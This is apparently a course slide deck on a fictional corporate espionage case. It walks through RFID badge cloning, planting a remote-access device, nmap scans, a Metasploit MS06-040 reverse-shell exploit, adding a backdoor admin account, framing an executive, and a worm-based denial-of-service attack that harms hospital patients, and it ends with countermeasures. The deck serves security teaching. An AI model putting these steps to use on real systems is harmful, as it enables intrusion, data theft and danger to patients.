260 likes | 391 Views
Tel 283. Corporate Espionage. Background. Comptetitor of Alki Pharmaceuticals wants to get any technical information or research Not have the hack traced back Launch a disabling attack on the hospital across from Alki Critical services impacted, resulting in patient death
E N D
Tel 283 Corporate Espionage
Background • Comptetitor of Alki Pharmaceuticals wants to get any technical information or research • Not have the hack traced back • Launch a disabling attack on the hospital across from Alki • Critical services impacted, resulting in patient death • “Contractor” threatened hacker’s girlfriend • Eight weeks allowed for the hack
Cost of corporate espionage • 1999 $25 Billion • US Chamber of Commerce survey • 2003 $89 Billion from the Fortune 1000 companies • Pricewaterhouse Coopers and ASIS survey (American Society for Industrial Security) • 2007 $100 Billion plus
The Exploit • Reconnaissance • Physical Access • Executing the Hacks • DoS of Hospital • Other “stuff”
Recon • Google search • “intext:alki pharmaceuticals” • Mentions software vendor for Alki • Get info from vendor’s webpage • Technical documentation • Type of servers • Ports • Technical forum • SA from Alki complaining about software’s restrictions • Physical recon • Employees have RFID badges • www.sec.gov • EDGAR search on publicly traded corporations
RFIDIOt • Python libraries for reading RFID devices • Readers are available for purchase • Depending on standard, anywhere from $50 to $1000 • A writer will clone a valid RFID device • Phoenix met official of Alki • Got physically close enough to read her badge • Now has access to every place the CFO is allowed
Social engineering • CFO takes “prospective employee” on tour • Observes which areas are carded • Reads cards of 15 employees • Remembering the order of cards being read and locations • Will attempt to get a janitor’s RFID card as well
Tools • Mini-PC with Vista • VMWare • Running Knoppix Live CD ISO • Integrated CDMA-EVO cellular card • Integrated 10/100 Ethernet NIC • Phoenix hopes to plant the mini-PC physically at Alki • Get IP via DHCP • Connect to Internet using the cellular card • Using Hotmail account traceable back to Alki employee (backup email account points back to the employee) • Set up GoToMyPC trial account • Physical intrusion set for when janitors start night services
Intrusion • Phoenix takes elevator (using cloned CFO’s card) and enters the NOC room • Uses card to enter the NOC room • No biometrics in place! • Racks are neatly labeled indicating which units are R&D switches
Intrusion • Phoenix plugs patch cable into an open port on R&D switch • Attaches the mini-PC to the switch • Gets an IP via DHCP • Boots up the Knoppix Live CD ISO under VMWare • Ifconfig reveals a supplied IP address of 10.0.0.6 • Going back to the host OS (Vista), he fires up the CDMA software • GoToMyPC is connected to the Internet • Secretes the mini-PC and the power supply • Takes a wireless access point, with an Alki inventory control tag and leaves
Intrusion • On the train going home Phoenix uses a CDMA connection on his laptop to verify a connection • Brings up a web browser • Utilizing the CFO’s bogus account, logs into www.gotomypc.com • Connects to the planted mini-PC in the Alki NOC room
Intrusion • On returning home, reconnects using GoToMyPC • Goes to the VMWare and in the shell starts up Nmap • nmap 10.0.0.0/24 • Shows the hosts and which ports are listening on these hosts • 10.0.0.14 • Shows port 12345, which was the port the R&D server listens on (info developed through passive intel gathering) • nmap –A 10.0.0.14 –p 12345 • Attempts to uncover the OS • Response is either XP / SP2 or Windows Server 2003 • Directory Services ports are open • Probably Windows Server 2003 host
Intrusion • Recalling complaints about vendor’s software being incapable of working with SP1 • www.microsoft.com/security • Search for SP1 fixes • MS06-040 netapi32.dll ex;oitable • Uses Metasploit to see if there’s an available exploit use windows/smb/ms06_040_netapi • Gets the Metasploit prompt msf exploit(ms06_040_netapi)>
Metasploit • At the Metasploit prompt set PAYLOAD generic/shell_reverse_tcp set RHOST 10.0.0.14 set LHOST 10.0.0.6 • Phoenix now sees the following on his screen C:\WINDOWS\system32> • Phoenix has access to the target system!
Intrusion: Target Access • Phoenix is on the target system with Local System privilege • Higher that Administrator!!! • Once on the target system Phoenix enters the following commands at the prompt • net user lindaalki$$ /ADD • (Linda is the CFO) • net localgroup administrators linda /ADD
Intrusion: Hospital • Phoenix walks into the hospital and locates a room with available Ethernet plugs near the ER • gets IP address • Plugs in the stolen Alki wireless access point • Resets the AP to factory defaults • Configures it to support DHCP • Verifies that he can connect via the AP • Jacks the laptop into Ethernet port • Runs nmap 10.10.10.0/24 • Response is 12 hosts • Possibly all in ER due to proximity • Maps out the OS on each host • Results go to ADS text file • Nmap -A 10.10.10.0/24 > c:\OSDetect.txt:ads.txt
Intrusion: Hospital • The laptop was purchased with cash with false information supplied at a computer “superstore” • Laptop loaded with viruses, virus construction kit, recon tools, etc • Using the laptop • Phoenix logged into the Hotmail account (posing as CFO from Alki) • Leaving the “remember me” settings on • Making investigators’ job easier • Sent/received emails asking for help on scanning, creating viruses and exploiting unpatched PCs • Visited websites, leaving history on PC • Verifies that the rouge access point functions from outside the hospital
Intrusion: Alki • R&D server partitions mapped out • C: system partition • D: data partition, shared by researchers • Over a network connection a network share is established to a 1TB drive attached • Windows “Backup” of D: target system to the 1 TB drive • Physical entry back into Alki NOC room • Using the mini-PC and Remote Desktop • Data partition deleted from D: • Windows system directory deleted from C:
DoS: Hospital • From coffee shop next to the hospital, Phoenix uses Remote Desktop to connect to the mini-PC in the hospital and executes “wshwc.exe” • Windows Scripting Host Worm Construction program
DoS: Hospital • WSHWC • Names the work Alkibot • Payload option: Launch Denial of Service Attack • Creates a separate worm for each of the 7 Unix (Solaris) hosts identified using nmap • These .vbs files, along with 5 additional .vbs files for the other Windows boxes are saved in the laptop • Bat file constructed to execute the .vbs files sequentially • Executes the bat file
DoS: Hospital • News reports • ER monitoring units (Solaris systems) were not able to send data out • Resulted in cardiac arrest of 1 patient • Incorrect medication prescribed to another patient • Drips ran out for two other patients • Alki executive arrested (CFO) • Alki stock value sharply down • Alki competitor announced they were ahead of schedule in release of drug
Other options • Breach of confidentiality of employee information • Creation of backdoors, shell account • Sell these • Access to Alki’s banking information (Accounting dept.) • Stock manipulation
Summary • Detailed tech info of Alki software uncovered by going to vendor’s site • RFID attack assisted in gaining physical access to Alki • Bolstered by social engineering • Nmap scan identified AlkiR&D server • Microsoft.com used to uncover potential exploits for the server • Metasploit used to invoke the exploit • Windows Backup used to copy R&D data remotely using network share • Delete of data (getting rid of evidence, causing diversion) • Hotmail account set up to implicate CFO • Set up rogue AP in hospital, lauchedDoS attack
Countermeasures • Physical security • Single factor access to restricted areas • Implement multi-layer measures • Note: Encryption of the RFID means nothing if it’s cloned as the attacker does not need to “read” the data, just use it • Cameras / CCTV should be used • Access device should not also be the ID card • ID card is visible, RFID device should be in a shielded carrier • Disable open ports on a switch
Countermeasures • Scanning attack • Turn off ICMP • Turn on Windows Firewall • Simplenmap scans would come back with no results • Possible to get results, just more complex scans • Client IDS • Cisco Security Agent (CSA) • Detects SYN stealth scans, for example • Perhaps make it impossible to determine which host was the R&D server
Countermeasures • Social Engineering • Training! • Policies • Testing of policies • OS attacks • Patching • Pressure vendor to fix application to work with later release of OS which is patched • Consider another software solution (dump the vendor) • Data theft • encryption